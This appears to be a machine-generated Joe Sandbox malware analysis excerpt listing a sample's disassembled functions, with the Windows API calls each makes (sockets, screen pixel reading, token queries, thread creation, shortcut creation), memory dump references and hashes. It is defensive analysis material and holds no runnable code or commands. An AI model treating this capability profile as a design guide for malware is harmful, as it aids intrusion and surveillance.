                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLastconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 3701255441-0
                                    • Opcode ID: cf6e6466eec33201e7d45231d3553da6861919a18af3335d7a93fb08669637e4
                                    • Instruction ID: cca7d74443f33a8538a8051f12c0812d9e9ce625438c20fd7c4280156969aa4e
                                    • Opcode Fuzzy Hash: cf6e6466eec33201e7d45231d3553da6861919a18af3335d7a93fb08669637e4
                                    • Instruction Fuzzy Hash: E121CD312002149FCB14BF28DC85BBE77A9EF58724F048559F906AB292DF70AE418B61
                                    Function 00188420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 00188441
                                    • GetForegroundWindow.USER32 ref: 00188458
                                    • GetDC.USER32(00000000), ref: 00188494
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 001884A0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 001884DB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: 2d5a870b1270d98afa57353f033b28524b790b916231e61031d567d91088a067
                                    • Instruction ID: 9784d5a1bed87ba05c05addeb742994d79178903b31ef139d6d0ca541dd31b7b
                                    • Opcode Fuzzy Hash: 2d5a870b1270d98afa57353f033b28524b790b916231e61031d567d91088a067
                                    • Instruction Fuzzy Hash: E6219076A00204AFD714EFA5EC89AAEBBF5EF48301F048479F85A97651DF70AD40CB60
                                    Function 0014AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0014AFE3
                                    • SelectObject.GDI32(?,00000000), ref: 0014AFF2
                                    • BeginPath.GDI32(?), ref: 0014B009
                                    • SelectObject.GDI32(?,00000000), ref: 0014B033
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: d25d4d4cd6b62c4b16e9ed39d0a4e2fb2102700725424b12b7daf859ff66425c
                                    • Instruction ID: 694f52bdcba062d648e0714bf2859b64d3b05d7cdb4083e43165a62d20de82ef
                                    • Opcode Fuzzy Hash: d25d4d4cd6b62c4b16e9ed39d0a4e2fb2102700725424b12b7daf859ff66425c
                                    • Instruction Fuzzy Hash: 2A2160B0904205FFDB14DF55EC847AA7B78BB24366F54431AF421D25B0D3B188C5CB91
                                    Function 0015217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __calloc_crt.LIBCMT ref: 001521A9
                                    • CreateThread.KERNEL32(?,?,001522DF,00000000,?,?), ref: 001521ED
                                    • GetLastError.KERNEL32 ref: 001521F7
                                    • _free.LIBCMT ref: 00152200
                                    • __dosmaperr.LIBCMT ref: 0015220B
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                    • String ID:
                                    • API String ID: 2664167353-0
                                    • Opcode ID: 1e5481df366c510ae5f3b03d1ff001869b8d2fc69e1eda78f6f6303acca7b869
                                    • Instruction ID: 7e00787459ddaf380b0cef788d586fb502bfeab41fa16a5ca759347054178c2f
                                    • Opcode Fuzzy Hash: 1e5481df366c510ae5f3b03d1ff001869b8d2fc69e1eda78f6f6303acca7b869
                                    • Instruction Fuzzy Hash: B6110837104746EFDB15AF65EC42DAB3798EF12771B100529FD348F191EB71D84586A0
                                    Function 0016ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0016ABD7
                                    • GetLastError.KERNEL32(?,0016A69F,?,?,?), ref: 0016ABE1
                                    • GetProcessHeap.KERNEL32(00000008,?,?,0016A69F,?,?,?), ref: 0016ABF0
                                    • RtlAllocateHeap.NTDLL(00000000,?,0016A69F), ref: 0016ABF7
                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0016AC0E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 883493501-0
                                    • Opcode ID: ec2047c29d626f2cc95b398511e8af0a9d18ac6f6ba6f9e4814a761fc9d6ff8c
                                    • Instruction ID: 064da6f060d98d335c362db33eca32130757a1a88c7f45434bc6ec3e374ea7c0
                                    • Opcode Fuzzy Hash: ec2047c29d626f2cc95b398511e8af0a9d18ac6f6ba6f9e4814a761fc9d6ff8c
                                    • Instruction Fuzzy Hash: B00119B5200205BFDB144FAAEC48DAB3BADEF8A7557100529F945D3260EB719C90CF61
                                    Function 00177A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177A74
                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00177A82
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00177A8A
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00177A94
                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: 8fe04172d9ff3ffd0da5dffbef5f4c5a8a38b2c46e8265bd480b62a959f6f343
                                    • Instruction ID: 61682a96b846cf9c6a369ffa9811c6388efe2a1db8ed29070771028863b57ba7
                                    • Opcode Fuzzy Hash: 8fe04172d9ff3ffd0da5dffbef5f4c5a8a38b2c46e8265bd480b62a959f6f343
                                    • Instruction Fuzzy Hash: FF018C75C04619EBEF04AFE8EC58AEDBB78FF08711F054155E402B3190EB309690C7A1
                                    Function 00169ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CLSIDFromProgID.COMBASE ref: 00169ADC
                                    • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00169AF7
                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00169B05
                                    • CoTaskMemFree.COMBASE(00000000), ref: 00169B15
                                    • CLSIDFromString.COMBASE(?,?), ref: 00169B21
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: fa770f704570a3e0cb1c905b4aed43625f8c87cca37dc883873d3044243469b4
                                    • Instruction ID: 139931fda860527f513859f0c4d442182a7f01bd8130c3364e2bc0b8f35e10ea
                                    • Opcode Fuzzy Hash: fa770f704570a3e0cb1c905b4aed43625f8c87cca37dc883873d3044243469b4
                                    • Instruction Fuzzy Hash: 92018BB6600209BFDB144F69EC44FAABAEDEB48352F148024F905D2220E770DD909BA0
                                    Function 0016AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0016AA79
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0016AA83
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0016AA92
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0016AA99
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0016AAAF
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: d0e4dd21870d8fe1553bad63b4e9ede9bacf3f0b2c508605dff3be92b49e9be7
                                    • Instruction ID: c7722626a5856ce13b9a0d5b4d94556a17d68610298eb9ae2cfd765c73510fe6
                                    • Opcode Fuzzy Hash: d0e4dd21870d8fe1553bad63b4e9ede9bacf3f0b2c508605dff3be92b49e9be7
                                    • Instruction Fuzzy Hash: EBF04F712002056FEB155FA5EC89E673BACFF49754F40052AF941D71A0EB609C91CA61
                                    Function 0016AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0016AADA
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0016AAE4
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0016AAF3
                                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0016AAFA
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0016AB10
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                                    • String ID:
                                    • API String ID: 47921759-0
                                    • Opcode ID: db09a203256f597c837db9963c397e7ad1b0d241f367dd60ad651399c5c2411e
                                    • Instruction ID: c25edfe6a7769f45f6a079428cc381d3f7ef5094f1bc5120359f515dc1e2b28e
                                    • Opcode Fuzzy Hash: db09a203256f597c837db9963c397e7ad1b0d241f367dd60ad651399c5c2411e
                                    • Instruction Fuzzy Hash: DCF062712002096FEB151FA5FC88E673BADFF45755F400129F941D7190DB60AC51CF61
                                    Function 0016EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 0016EC94
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0016ECAB
                                    • MessageBeep.USER32(00000000), ref: 0016ECC3
                                    • KillTimer.USER32(?,0000040A), ref: 0016ECDF
                                    • EndDialog.USER32(?,00000001), ref: 0016ECF9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 08c1f9a8b4d9bb8956243b58c120a347ca7270f13ebc949a10c4eedae9794d71
                                    • Instruction ID: c5b9161338159b70298119322c39731b783755a5806f5475a0a6b6e06c1d325e
                                    • Opcode Fuzzy Hash: 08c1f9a8b4d9bb8956243b58c120a347ca7270f13ebc949a10c4eedae9794d71
                                    • Instruction Fuzzy Hash: 7701A934500705ABEB386B10EE9EB9677B8FF00B05F000759B543614E0EBF0A994CB40
                                    Function 0014B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • EndPath.GDI32(?), ref: 0014B0BA
                                    • StrokeAndFillPath.GDI32(?,?,001AE680,00000000,?,?,?), ref: 0014B0D6
                                    • SelectObject.GDI32(?,00000000), ref: 0014B0E9
                                    • DeleteObject.GDI32 ref: 0014B0FC
                                    • StrokePath.GDI32(?), ref: 0014B117
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 08ddf0214aeb1c56251c121b80f3cb2e48c9d3ca3c18e3dd38a207656798bdfc
                                    • Instruction ID: a2fc2cb77ec7475c38e4c915fc7d771911ac43324dc0070d1bf5b542c5791791
                                    • Opcode Fuzzy Hash: 08ddf0214aeb1c56251c121b80f3cb2e48c9d3ca3c18e3dd38a207656798bdfc
                                    • Instruction Fuzzy Hash: 87F0C434008249EFDB29AF69FC4D7A93B65AB10772F088315F829858F0D7B189E6DF54
                                    Function 0017F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 0017F2DA
                                    • CoCreateInstance.COMBASE(001BDA7C,00000000,00000001,001BD8EC,?), ref: 0017F2F2
                                    • CoUninitialize.COMBASE ref: 0017F555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize
                                    • String ID: .lnk
                                    • API String ID: 948891078-24824748
                                    • Opcode ID: 474291242b21355a91db07125f3ece18c15d2353edf604031cf0264075bf2f78
                                    • Instruction ID: 8d03d5190a637f3bb75a10da1f5f85b080a73c1f269682c3d74d69635299e985
                                    • Opcode Fuzzy Hash: 474291242b21355a91db07125f3ece18c15d2353edf604031cf0264075bf2f78
                                    • Instruction Fuzzy Hash: 73A12C71504201AFD304EF64C881DAFB7ECEFA8714F40492DF559971A2EB70EA49CBA2
                                    Function 0017E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0013660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001353B1,?,?,001361FF,?,00000000,00000001,00000000), ref: 0013662F
                                    • CoInitialize.OLE32(00000000), ref: 0017E85D
                                    • CoCreateInstance.COMBASE(001BDA7C,00000000,00000001,001BD8EC,?), ref: 0017E876
                                    • CoUninitialize.COMBASE ref: 0017E893
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: f5e8863750487f97f373df5b19cfd7ad73d9ff1e2d81e328d5e6ab1538ac011d
                                    • Instruction ID: c581ab4f5915a002c2f94e7ce11e1ea51c6eb54b80e398d58ff849a1534951b7
                                    • Opcode Fuzzy Hash: f5e8863750487f97f373df5b19cfd7ad73d9ff1e2d81e328d5e6ab1538ac011d
                                    • Instruction Fuzzy Hash: 9AA143756043019FCB14EF24C88496EBBF5BF89324F148998F99A9B3A1CB31EC45CB91
                                    Function 0015325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 001532ED
                                      • Part of subcall function 0015E0D0: __87except.LIBCMT ref: 0015E10B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 444137bb3d1e806fb191ab7913a63207b7dbffdd1f1471a62e6a64d9c7967ecb
                                    • Instruction ID: dd2b8b67cc939fbd4e5c1a5fa1dd4c0586a6dfd168e588831ad2afdd968aae5e
                                    • Opcode Fuzzy Hash: 444137bb3d1e806fb191ab7913a63207b7dbffdd1f1471a62e6a64d9c7967ecb
                                    • Instruction Fuzzy Hash: E2513631E08601D6CB1D6714C94137A2BD4AB50792F208D68FCF68F2A9EF748BDC9A46
                                    Function 00174606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,001CDC50,?,0000000F,0000000C,00000016,001CDC50,?), ref: 00174645
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001746C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
